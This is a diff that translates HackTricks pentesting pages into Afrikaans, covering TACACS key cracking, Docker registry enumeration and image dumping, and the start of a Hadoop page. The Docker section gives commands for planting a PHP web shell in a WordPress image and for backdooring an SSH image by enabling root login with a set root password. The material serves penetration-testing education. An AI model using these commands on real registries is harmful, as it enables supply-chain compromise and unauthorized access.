-[Loki](https://c0decafe.de/svn/codename\_loki/trunk/) can be used to brute force the key: +### Brute force-aanval op die Sleutel +[Loki](https://c0decafe.de/svn/codename\_loki/trunk/) kan gebruik word om die sleutel te kraak: ``` sudo loki_gtk.py ``` +As die sleutel suksesvol **bruteforced** word (**gewoonlik in MD5 versleutelde formaat)**, **kan ons toegang verkry tot die toerusting en die TACACS-versleutelde verkeer ontsluit.** -If the key is successfully **bruteforced** (**usually in MD5 encrypted format)**, **we can access the equipment and decrypt the TACACS-encrypted traffic.** +### Ontsluiting van Verkeer +Sodra die sleutel suksesvol gekraak is, is die volgende stap om die TACACS-versleutelde verkeer te **ontsluit**. Wireshark kan versleutelde TACACS-verkeer hanteer as die sleutel voorsien word. Deur die ontslote verkeer te analiseer, kan inligting soos die **banier wat gebruik word en die gebruikersnaam van die admin-gebruiker** verkry word. -### Decrypting Traffic -Once the key is successfully cracked, the next step is to **decrypt the TACACS-encrypted traffic**. Wireshark can handle encrypted TACACS traffic if the key is provided. By analyzing the decrypted traffic, information such as the **banner used and the username of the admin** user can be obtaine. +Deur toegang tot die beheerpaneel van netwerktoerusting te verkry deur die verkryde geloofsbriewe, kan die aanvaller beheer oor die netwerk uitoefen. Dit is belangrik om daarop te let dat hierdie aksies slegs vir opvoedkundige doeleindes is en nie sonder behoorlike magtiging gebruik moet word nie. -By gaining access to the control panel of network equipment using the obtained credentials, the attacker can exert control over the network. It's important to note that these actions are strictly for educational purposes and should not be used without proper authorization. - -## References +## Verwysings * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/network-services-pentesting/5000-pentesting-docker-registry.md b/network-services-pentesting/5000-pentesting-docker-registry.md index b2b2d2937..ef6d98d1c 100644 --- a/network-services-pentesting/5000-pentesting-docker-registry.md +++ b/network-services-pentesting/5000-pentesting-docker-registry.md @@ -1,76 +1,67 @@ -# 5000 - Pentesting Docker Registry +# 5000 - Pentesting Docker Register
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -A storage and distribution system known as a **Docker registry** is in place for Docker images that are named and may come in multiple versions, distinguished by tags. These images are organized within **Docker repositories** in the registry, each repository storing various versions of a specific image. The functionality provided allows for images to be downloaded locally or uploaded to the registry, assuming the user has the necessary permissions. +'n Berging- en verspreidingsisteem bekend as 'n **Docker-register** is in plek vir Docker-beelde wat benoem is en in verskillende weergawes kan voorkom, onderskei deur etikette. Hierdie beelde is georganiseer binne **Docker-opgaarplekke** in die register, elke opgaarplek stoor verskillende weergawes van 'n spesifieke beeld. Die funksionaliteit wat verskaf word, maak dit moontlik om beelde lokaal af te laai of na die register te laai, mits die gebruiker die nodige toestemmings het. -**DockerHub** serves as the default public registry for Docker, but users also have the option to operate an on-premise version of the open-source Docker registry/distribution or opt for the commercially supported **Docker Trusted Registry**. Additionally, various other public registries can be found online. - -To download an image from an on-premise registry, the following command is used: +**DockerHub** dien as die verstek openbare register vir Docker, maar gebruikers het ook die opsie om 'n plaaslike weergawe van die oopbron Docker-register/verspreiding te bedryf of te kies vir die kommersieel ondersteunde **Docker Trusted Registry**. Daarbenewens kan verskeie ander openbare registerplekke aanlyn gevind word. +Om 'n beeld van 'n plaaslike register af te laai, word die volgende opdrag gebruik: ```bash docker pull my-registry:9000/foo/bar:2.1 ``` - -This command fetches the `foo/bar` image version `2.1` from the on-premise registry at the `my-registry` domain on port `9000`. Conversely, to download the same image from DockerHub, particularly if `2.1` is the latest version, the command simplifies to: - +Hierdie bevel haal die `foo/bar` beeld weergawe `2.1` van die aan-premises register by die `my-registry` domein op poort `9000`. Om dieselfde beeld van DockerHub af te laai, veral as `2.1` die nuutste weergawe is, vereenvoudig die bevel na: ```bash docker pull foo/bar ``` - -**Default port:** 5000 - +**Verstekpoort:** 5000 ``` PORT STATE SERVICE VERSION 5000/tcp open http Docker Registry (API: 2.0) ``` +## Ontdekking -## Discovering +Die maklikste manier om hierdie diens te ontdek wat loop, is om dit op die uitset van nmap te kry. Hoe dan ook, let daarop dat dit 'n HTTP-gebaseerde diens kan wees wat agter HTTP-proksi's is en nmap sal dit nie opspoor nie.\ +Sommige vingerafdrukke: -The easiest way to discover this service running is get it on the output of nmap. Anyway, note that as it's a HTTP based service it can be behind HTTP proxies and nmap won't detect it.\ -Some fingerprints: +* As jy `/` toegang gee, word niks in die respons teruggegee nie +* As jy `/v2/` toegang gee, word `{}` teruggegee +* As jy `/v2/_catalog` toegang gee, kan jy kry: +* `{"repositories":["alpine","ubuntu"]}` +* `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}` -* If you access `/` nothing is returned in the response -* If you access `/v2/` then `{}` is returned -* If you access `/v2/_catalog` you may obtain: - * `{"repositories":["alpine","ubuntu"]}` - * `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}` - -## Enumeration +## Opname ### HTTP/HTTPS -Docker registry may be configured to use **HTTP** or **HTTPS**. So the first thing you may need to do is **find which one** is being configured: - +Docker-register kan gekonfigureer word om **HTTP** of **HTTPS** te gebruik. Die eerste ding wat jy moet doen, is dus **uitvind watter een** gekonfigureer word: ```bash curl -s http://10.10.10.10:5000/v2/_catalog #If HTTPS -Warning: Binary output can mess up your terminal. Use "--output -" to tell -Warning: curl to output it to your terminal anyway, or consider "--output +Warning: Binary output can mess up your terminal. Use "--output -" to tell +Warning: curl to output it to your terminal anyway, or consider "--output Warning: " to save to a file. #If HTTP {"repositories":["alpine","ubuntu"]} ``` +### Verifikasie -### Authentication - -Docker registry may also be configured to require **authentication**: - +Docker-register kan ook ingestel word om **verifikasie** te vereis: ```bash curl -k https://192.25.197.3:5000/v2/_catalog #If Authentication required @@ -78,18 +69,14 @@ curl -k https://192.25.197.3:5000/v2/_catalog #If no authentication required {"repositories":["alpine","ubuntu"]} ``` - -If the Docker Registry is requiring authentication you can[ **try to brute force it using this**](../generic-methodologies-and-resources/brute-force.md#docker-registry).\ -**If you find valid credentials you will need to use them** to enumerate the registry, in `curl` you can use them like this: - +As die Docker Register verifikasie vereis, kan jy probeer om dit te kragtig deur dit te [brute force](../generic-methodologies-and-resources/brute-force.md#docker-registry).\ +**As jy geldige geloofsbriewe vind, sal jy dit moet gebruik** om die register op te som, in `curl` kan jy dit so gebruik: ```bash curl -k -u username:password https://10.10.10.10:5000/v2/_catalog ``` +### Enumerasie met behulp van DockerRegistryGrabber -### Enumeration using DockerRegistryGrabber - -[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber) is a python tool to enumerate / dump docker degistry (without or with basic authentication) - +[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber) is 'n Python-hulpmiddel om 'n Docker-registreering te enumereer / dump (sonder of met basiese outentifikasie). ```bash python3 DockerGraber.py http://127.0.0.1 --list @@ -102,35 +89,33 @@ python3 DockerGraber.py http://127.0.0.1 --dump_all [+] my-ubuntu2 [+] blobSum found 5 [+] Dumping my-ubuntu - [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 - [+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 - [+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 - [+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 - [+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 +[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 +[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 +[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 +[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 +[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 [+] blobSum found 5 [+] Dumping my-ubuntu2 - [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 - [+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 - [+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 - [+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 - [+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 +[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 +[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 +[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 +[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 +[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 python3 DockerGraber.py http://127.0.0.1 --dump my-ubuntu [+] blobSum found 5 [+] Dumping my-ubuntu - [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 - [+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 - [+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 - [+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 - [+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 +[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 +[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 +[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 +[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 +[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 ``` +### Enumerasie met behulp van curl -### Enumeration using curl - -Once you **obtained access to the docker registry** here are some commands you can use to enumerate it: - +Sodra jy toegang tot die Docker-register verkry het, is hier 'n paar opdragte wat jy kan gebruik om dit te enumereer: ```bash #List repositories curl -s http://10.10.10.10:5000/v2/_catalog @@ -143,48 +128,48 @@ curl -s http://192.251.36.3:5000/v2/ubuntu/tags/list #Get manifests curl -s http://192.251.36.3:5000/v2/ubuntu/manifests/latest { - "schemaVersion": 1, - "name": "ubuntu", - "tag": "latest", - "architecture": "amd64", - "fsLayers": [ - { - "blobSum": "sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935" - }, - { - "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" - }, - { - "blobSum": "sha256:e7c96db7181be991f19a9fb6975cdbbd73c65f4a2681348e63a141a2192a5f10" - } - ], - "history": [ - { - "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container_config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:96c69e5db7e6d87db2a51d3894183e9e305a144c73659d5578d300bd2175b5d6 in /etc/network/if-post-up.d \"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"created\":\"2019-05-13T14:06:51.794876531Z\",\"docker_version\":\"18.09.4\",\"id\":\"911999e848d2c283cbda4cd57306966b44a05f3f184ae24b4c576e0f2dfb64d0\",\"os\":\"linux\",\"parent\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\"}" - }, - { - "v1Compatibility": "{\"id\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\",\"parent\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.510395965Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}" - }, - { - "v1Compatibility": "{\"id\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.358250803Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:a86aea1f3a7d68f6ae03397b99ea77f2e9ee901c5c59e59f76f93adbb4035913 in / \"]}}" - } - ], - "signatures": [ - { - "header": { - "jwk": { - "crv": "P-256", - "kid": "DJNH:N6JL:4VOW:OTHI:BSXU:TZG5:6VPC:D6BP:6BPR:ULO5:Z4N4:7WBX", - "kty": "EC", - "x": "leyzOyk4EbEWDY0ZVDoU8_iQvDcv4hrCA0kXLVSpCmg", - "y": "Aq5Qcnrd-6RO7VhUS2KPpftoyjjBWVoVUiaPluXq4Fg" - }, - "alg": "ES256" - }, - "signature": "GIUf4lXGzdFk3aF6f7IVpF551UUqGaSsvylDqdeklkUpw_wFhB_-FVfshodDzWlEM8KI-00aKky_FJez9iWL0Q", - "protected": "eyJmb3JtYXRMZW5ndGgiOjI1NjQsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMS0wMS0wMVQyMDoxMTowNFoifQ" - } - ] +"schemaVersion": 1, +"name": "ubuntu", +"tag": "latest", +"architecture": "amd64", +"fsLayers": [ +{ +"blobSum": "sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935" +}, +{ +"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" +}, +{ +"blobSum": "sha256:e7c96db7181be991f19a9fb6975cdbbd73c65f4a2681348e63a141a2192a5f10" +} +], +"history": [ +{ +"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container_config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:96c69e5db7e6d87db2a51d3894183e9e305a144c73659d5578d300bd2175b5d6 in /etc/network/if-post-up.d \"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"created\":\"2019-05-13T14:06:51.794876531Z\",\"docker_version\":\"18.09.4\",\"id\":\"911999e848d2c283cbda4cd57306966b44a05f3f184ae24b4c576e0f2dfb64d0\",\"os\":\"linux\",\"parent\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\"}" +}, +{ +"v1Compatibility": "{\"id\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\",\"parent\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.510395965Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}" +}, +{ +"v1Compatibility": "{\"id\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.358250803Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:a86aea1f3a7d68f6ae03397b99ea77f2e9ee901c5c59e59f76f93adbb4035913 in / \"]}}" +} +], +"signatures": [ +{ +"header": { +"jwk": { +"crv": "P-256", +"kid": "DJNH:N6JL:4VOW:OTHI:BSXU:TZG5:6VPC:D6BP:6BPR:ULO5:Z4N4:7WBX", +"kty": "EC", +"x": "leyzOyk4EbEWDY0ZVDoU8_iQvDcv4hrCA0kXLVSpCmg", +"y": "Aq5Qcnrd-6RO7VhUS2KPpftoyjjBWVoVUiaPluXq4Fg" +}, +"alg": "ES256" +}, +"signature": "GIUf4lXGzdFk3aF6f7IVpF551UUqGaSsvylDqdeklkUpw_wFhB_-FVfshodDzWlEM8KI-00aKky_FJez9iWL0Q", +"protected": "eyJmb3JtYXRMZW5ndGgiOjI1NjQsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMS0wMS0wMVQyMDoxMTowNFoifQ" +} +] } #Download one of the previously listed blobs @@ -193,13 +178,11 @@ curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fa #Inspect the insides of each blob tar -xf blob1.tar #After this,inspect the new folders and files created in the current directory ``` - {% hint style="warning" %} -Note that when you download and decompress the blobs files and folders will appear in the current directory. **If you download all the blobs and decompress them in the same folder they will overwrite values from the previously decompressed blobs**, so be careful. It may be interesting to decompress each blob inside a different folder to inspect the exact content of each blob. +Let daarop dat wanneer jy die blobs lêers aflaai en dekomprimeer, sal lêers en vouers in die huidige gids verskyn. **As jy al die blobs aflaai en hulle in dieselfde vouer dekomprimeer, sal waardes van vorige gedekomprimeerde blobs oorskryf word**, so wees versigtig. Dit mag interessant wees om elke blob binne 'n ander vouer te dekomprimeer om die presiese inhoud van elke blob te ondersoek. {% endhint %} -### Enumeration using docker - +### Enumerasie met behulp van Docker ```bash #Once you know which images the server is saving (/v2/_catalog) you can pull them docker pull 10.10.10.10:5000/ubuntu @@ -207,22 +190,21 @@ docker pull 10.10.10.10:5000/ubuntu #Check the commands used to create the layers of the image docker history 10.10.10.10:5000/ubuntu #IMAGE CREATED CREATED BY SIZE COMMENT -#ed05bef01522 2 years ago ./run.sh 46.8MB -# 2 years ago /bin/sh -c #(nop) CMD ["./run.sh"] 0B -# 2 years ago /bin/sh -c #(nop) EXPOSE 80 0B -# 2 years ago /bin/sh -c cp $base/mysql-setup.sh / 499B -# 2 years ago /bin/sh -c #(nop) COPY dir:0b657699b1833fd59… 16.2MB +#ed05bef01522 2 years ago ./run.sh 46.8MB +# 2 years ago /bin/sh -c #(nop) CMD ["./run.sh"] 0B +# 2 years ago /bin/sh -c #(nop) EXPOSE 80 0B +# 2 years ago /bin/sh -c cp $base/mysql-setup.sh / 499B +# 2 years ago /bin/sh -c #(nop) COPY dir:0b657699b1833fd59… 16.2MB #Run and get a shell docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running docker ps #Using a different shell docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container ``` +### Backdooring WordPress-beeld -### Backdooring WordPress image - -In the scenario where you have found a Docker Registry saving a wordpress image you can backdoor it.\ -**Create** the **backdoor**: +In die scenario waar jy 'n Docker Registry gevind het wat 'n WordPress-beeld stoor, kan jy dit agterdeur gee. +**Skep** die **agterdeur**: {% code title="shell.php" %} ```bash @@ -230,7 +212,7 @@ In the scenario where you have found a Docker Registry saving a wordpress image ``` {% endcode %} -Create a **Dockerfile**: +Skep 'n **Dockerfile**: {% code title="Dockerfile" %} ```bash @@ -240,34 +222,28 @@ RUN chmod 777 /app/shell.php ``` {% endcode %} -**Create** the new image, **check** it's created, and **push** it: - +**Skep** die nuwe prent, **kontroleer** of dit geskep is, en **stoot** dit: ```bash docker build -t 10.10.10.10:5000/wordpress . - #Create +#Create docker images docker push registry:5000/wordpress #Push it ``` +### Agterdeur SSH-bedienerbeeld -### Backdooring SSH server image - -Suppose that you found a Docker Registry with a SSH image and you want to backdoor it.\ -**Download** the image and **run** it: - +Stel dat jy 'n Docker Registry met 'n SSH-beeld gevind het en jy wil dit agterdeur.\ +**Laai** die beeld af en **voer** dit uit: ```bash docker pull 10.10.10.10:5000/sshd-docker-cli docker run -d 10.10.10.10:5000/sshd-docker-cli ``` - -Extract the `sshd_config` file from the SSH image: - +Haal die `sshd_config` lêer uit die SSH prent: ```bash docker cp 4c989242c714:/etc/ssh/sshd_config . ``` +En wysig dit om `PermitRootLogin yes` in te stel. -And modify it to set: `PermitRootLogin yes` - -Create a **Dockerfile** like the following one: +Skep 'n **Dockerfile** soos die volgende: {% tabs %} {% tab title="Dockerfile" %} @@ -279,28 +255,26 @@ RUN echo root:password | chpasswd {% endtab %} {% endtabs %} -**Create** the new image, **check** it's created, and **push** it: - +**Skep** die nuwe prent, **kontroleer** of dit geskep is, en **stoot** dit: ```bash docker build -t 10.10.10.10:5000/sshd-docker-cli . - #Create +#Create docker images docker push registry:5000/sshd-docker-cli #Push it ``` - -## References +## Verwysings * [https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md b/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md index 2a7cd53ec..7fd707565 100644 --- a/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md +++ b/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md @@ -1,25 +1,23 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling 